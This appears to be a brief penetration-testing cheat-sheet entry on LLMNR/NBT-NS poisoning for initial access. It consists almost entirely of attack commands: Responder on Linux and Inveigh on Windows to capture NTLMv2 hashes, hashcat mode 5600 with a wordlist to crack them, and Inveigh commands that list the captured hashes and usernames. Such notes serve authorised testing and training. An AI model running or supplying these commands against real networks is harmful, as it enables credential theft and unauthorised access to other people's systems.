Tags
Initial AccessNETBIOSLLMNR
From Linux
sudo responder -I eth0
Wait for hashes to come in
Crack them with
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
From Windows
Using Inveigh
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
C# Inveigh (InveighZero)
.\Inveigh.exe
We can quickly view unique captured hashes by typing GET NTLMV2UNIQUE
.
We can type in GET NTLMV2USERNAMES
and see which
usernames we have collected. This is helpful if we want a listing of
users to perform additional enumeration against and see which are worth
attempting to crack offline using Hashcat.